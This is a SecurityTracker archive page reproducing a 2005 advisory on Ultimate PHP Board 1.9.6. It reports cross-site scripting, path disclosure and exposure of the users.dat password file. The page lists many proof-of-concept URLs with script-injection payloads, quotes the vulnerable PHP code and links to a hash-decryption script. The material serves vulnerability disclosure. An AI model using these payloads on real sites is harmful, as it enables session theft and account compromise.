SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Ultimate PHP Board Vendors:   Hoeppner, Tim
Ultimate PHP Board Input Validation Holes in Multiple Scripts Allow Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1014220
SecurityTracker URL:  http://securitytracker.com/id/1014220
CVE Reference:   CVE-2005-2004   (Links to External Site)
Updated:  Jun 21 2006
Original Entry Date:  Jun 16 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of authentication information
Exploit Included:  Yes  
Version(s): 1.9.6 GOLD and prior versions
Description:   Several input validation vulnerabilities were reported in Ultimate PHP Board (UPB). A remote user can conduct cross-site scripting attacks.

The 'login.php' script does not properly validate user-supplied input in the 'rev' parameter. Other scripts are also affected, including the 'viewtopic.php', 'profile.php', 'newpost.php', 'email.php', 'icq.php', 'aol.php', 'getpass.php', and 'search.php' scripts. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the UPB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.cookies)%3C/script%3E

http://[target]/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

On some systems, a remote user can supply the following type of URL to obtain potentially sensitive user information:

http://[target]/upb/db/users.dat

A remote user can supply specially crafted parameter values to cause the system to disclose the installation path.

Some demonstration exploit URLs are provided:

http://[target]/upb/viewtopic.php?id=0

http://[target]/upb/profile.php?action=get&id=0

http://[target]/upb/newpost.php?t_id=0

Alberto Trivero reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the UPB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can obtain information about the users on the target application.

A remote user can determine the installation path.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.myupb.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB


M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB 1.9.6 GOLD

Published: 06 16 2005

Released: 06 16 2005

Name: Ultimate PHP Board (UPB)

Affected Systems: <= 1.9.6 GOLD

Issue: Full Path Disclosure, Cross-Site Scripting, Sensitive Information
Disclosure

Author: Alberto Trivero

Vendor: http://www.myupb.com/ourscripts_upb.php





Software Description

***********


"UPB is a forum/message board script. It supports threaded discussion with a
comprehesive text database system that we wrote here at php outburst for the
backend."



Full Path Disclosure

*******


Thanks to an improper control of the value of some variables it's possible
to cause some errors and obtain the full path by sending simples requests
like these:

    http://www.example.com/upb/viewtopic.php?id=0
    http://www.example.com/upb/profile.php?action=get&id=0
    http://www.example.com/upb/newpost.php?t_id=0



Cross-Site Scripting (XSS)

*******


Let's look at code from login.php at line 69:

    <?
    ...
    echo "<form action='login.php?ref=$ref&l=1' method=POST>

    <center>$skin_tableheading
    ...
    ?>

The $rev parameter can be controlled by a remote user and when UPB get the
value don't sanitise properly it, so a malicious user can inject some HTML
code like this:

    '><script>alert(document.cookie)</script>

that will change the HTML line in:

    <form
action='login.php?ref='><script>alert(document.cookie)</script>&l=1'
method=POST>

executing the <script>...</script> tag that show, in this case, the cookies.
This is the PoC URL:


http://www.example.com/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.co
okie)%3C/script%3E

Let's look now at code from viewtopic.php at line 13:

    <?
    ...
    $where = "<b>></b> <a href='viewforum.php?id=$id'>$w_forum[forum]</a>
<b>></b> $w_topic[subject]";
    ...
    ?>

We can notice in the $id parameter the same preceding problem explottable
with an URL like this:


http://www.example.com/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document
.cookie)%3C/script%3E

These are other PoC URLs for other parameters:


http://www.example.com/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E

http://www.example.com/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

http://www.example.com/upb/newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

http://www.example.com/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.c
ookie)%3C/script%3E

http://www.example.com/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.coo
kies)%3C/script%3E

http://www.example.com/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(doc
ument.cookie)%3C/script%3E

http://www.example.com/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(doc
ument.cookie)%3C/script%3E

http://www.example.com/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://www.example.com/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(d
ocument.cookie)%3C/script%3E



Sensitive Information Disclosure

*********


In many cases (every time with non Apache webservers but some time also with
its) it's possible to obtain sensitives informations about all the users
registered on the UPB forum by surfing on this file:

    http://www.example.com/upb/db/users.dat

and viewing informations structured in this way:


user_name<~>password<~>level<~>email<~>view_email<~>mail_list<~>location<~>u
rl<~>avatar<~>icq<~>aim<~>msn<~>sig<~>posts<~>date_added<~>id

The passwords of users are crypted and for automate the decription I made a
code available at this address: http://albythebest.altervista.org/upb.pl



Solution

*********


The vendor has been contacted many times but a patch was not yet produced.



Alberto Trivero - trivero@jumpy.it

Come cheer us at #security-it on Freenode ( irc.freenode.net )

(C) 2005 Copyright by Madroot Security Group

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC